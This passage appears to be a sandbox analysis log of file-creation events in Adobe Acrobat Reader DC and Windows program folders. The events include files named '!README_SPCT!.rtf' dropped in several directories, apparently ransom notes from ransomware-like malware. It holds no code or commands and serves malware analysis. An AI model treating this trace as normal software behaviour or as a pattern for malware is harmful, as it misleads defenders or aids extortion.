| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviews_super.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\submission_history.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\LightTheme.acrotheme | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_retina_thumb_highContrast_wob.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\illustrations.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\hscroll-thumb.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner_dark.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adc_logo.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\email_all.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-up.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-high-contrast.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\cs-cz\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\open_original_form.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\rss.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-ma\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOffNotificationInTray.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-144x144-precomposed.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-mac.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\core_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress-indeterminate.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-left.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\Templates\Memo.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Mail\wab.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Certificates_R.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\vscroll-thumb.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons_retina_thumb.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-down.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\EPDF_Full.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_int_2x.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_hiContrast_bow.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\large_trefoil.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\de-de\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hu-hu\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\close_x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ro-ro\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ru-ru\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\selection-actions.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_retina_thumb_highContrast_bow.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-tw\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-144x144-precomposed.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons__retina_hiContrast_wob.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner2x.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\illustrations_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\config.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_int_2x.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\close_x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\logo_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fi-fi\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-down.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\es-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\nb-no\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\vscroll-thumb.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-down-pressed.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\tr-tr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\da-dk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-ae\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pl-pl\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\it-it\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\uk-ua\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sk-sk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hr-hr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\root\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app-api\dev\app-api.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\misc\load-typekit.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\eu-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\new_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\nl-nl\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\core_icons_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fi-fi\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-right.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-gb\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-down-pressed.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-left-pressed.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-ae\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ja-jp\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\it-it\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Scan_R_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sk-sk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sl-si\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ca-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\main-selector.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-fr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\new_icons_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner_dark2x.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-il\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prc\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pt-br\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ko-kr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-cn\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sv-se\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\SaveAsRTF.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\main.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\es-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nb-no\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
